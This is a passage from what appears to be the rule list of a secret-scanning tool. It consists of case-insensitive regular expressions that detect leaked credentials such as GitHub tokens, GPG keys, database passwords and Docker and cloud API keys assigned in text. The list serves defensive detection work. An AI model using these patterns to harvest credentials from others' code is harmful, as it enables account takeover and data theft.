"(?i)[\"']?gradle[_-]?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?secret[_-]?keys[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?ownertrust[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?keyname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?maps[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?client[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?account[_-]?type[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gogs[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gitlab[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?tokens[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?repo[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?oauth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?hunter[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?hunter[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?deployment[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?committer[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?committer[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?author[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?author[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ghost[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ghb[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcs[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcr[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcloud[_-]?service[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcloud[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcloud[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?fossa[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?flickr[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?flickr[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?flask[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firefox[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?project[_-]?develop[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?api[_-]?json[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?file[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?exp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?eureka[_-]?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?end[_-]?user[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?encryption[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?elasticsearch[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?elastic[_-]?cloud[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dsonar[_-]?projectkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dsonar[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?droplet[_-]?travis[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dropbox[_-]?oauth[_-]?bearer[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?doordash[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dockerhubpassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dockerhub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?postgres[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?passwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?hub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?digitalocean[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dgpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ddgc[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ddg[_-]?test[_-]?email[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ddg[_-]?test[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?connection[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?datadog[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?datadog[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?port[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?danger[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cypress[_-]?record[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coverity[_-]?scan[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coveralls[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coveralls[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coveralls[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cos[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?conversation[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?v2[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?integration[_-]?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?cma[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?consumerkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?conekta[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coding[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?codecov[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?codeclimate[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?codacy[_-]?project[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cocoapods[_-]?trunk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cocoapods[_-]?trunk[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?clu[_-]?repo[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudinary[_-]?url[_-]?staging[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudinary[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?auth[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?service[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?processed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?parsed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?order[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?instance[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?audited[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?archived[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloud[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?clojars[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cli[_-]?e2e[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?superuser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?user[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?server[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?registry[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?project[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ci[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?chrome[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?chrome[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cheverny[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cf[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?certificate[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?censys[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cattle[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cattle[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cargo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cache[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bx[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bx[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bundlesize[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?built[_-]?branch[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 